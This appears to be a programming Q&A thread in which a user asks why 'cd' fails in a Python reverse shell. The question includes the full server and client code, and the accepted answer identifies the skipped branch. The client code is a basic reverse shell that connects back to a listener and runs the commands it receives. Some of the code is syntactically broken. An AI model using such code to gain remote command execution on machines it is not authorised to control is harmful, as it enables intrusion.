# python3 - cd is not working in reverse shell

Tags: python, shell, sockets

This is in python 3.
I'm trying to command cd from my server to the reverse shell, but it just won't work.
All it does is just let me type another command. Like when I type "cd .." for example, it won't change the directory...I dont get what I did wrong...

Here is the code for `server.py`:

```
import socket
import sys

HOST = "127.0.0.1"
PORT = 54333


def sockets():
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)  

sockets()

s.bind((HOST, PORT))  
s.listen(5)  
print("listening")   


target, ip = s.accept()
print("connected")
if target or ip:
   shell()
else:
   pass

def shell():  # Method of getting shell.
   while True:
       command_input = input(f"{ip}: ")
       elif command_input[:2] == "cd":
           continue
       else:
           target.send(command_input.encode())
           recv = target.recv(1024).decode()
           print(recv)
       

shell()
```

And here is the code for the  `client.py`:

```
#!/usr/bin/python

import socket
import subprocess
import os

HOST = "127.0.0.1"
PORT = 54333


def sockets():
   s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
   s.connect((HOST, PORT))

sockets()

while True:
   command = s.recv(1024).lower().decode()
   if command.startswith("cd "):
       os.chdir(str(command[3:]))
       s.send(os.getcwd().encode())
   else:
       output = subprocess.getoutput(command)
       s.send(output.encode())
```

**Thanks for everyone.**

EDIT:
There might be some small problems, because I edited my original code to make it short as impossible for you.

Answer (score 0, accepted):

You never send "cd .." string to client. Because:

```
elif command_input[:2] == "cd":
           continue
```

The rest of your program should work just fine.

( And a small problem: Server is a program that runs the final commands, And Client is the one who gives orders )

Comment: Thanks. i dont know how i didnt see it...
And the problem you said, I did that on purpse deliberately.

Comment: @fam Great. Don't forget to Choose the answer!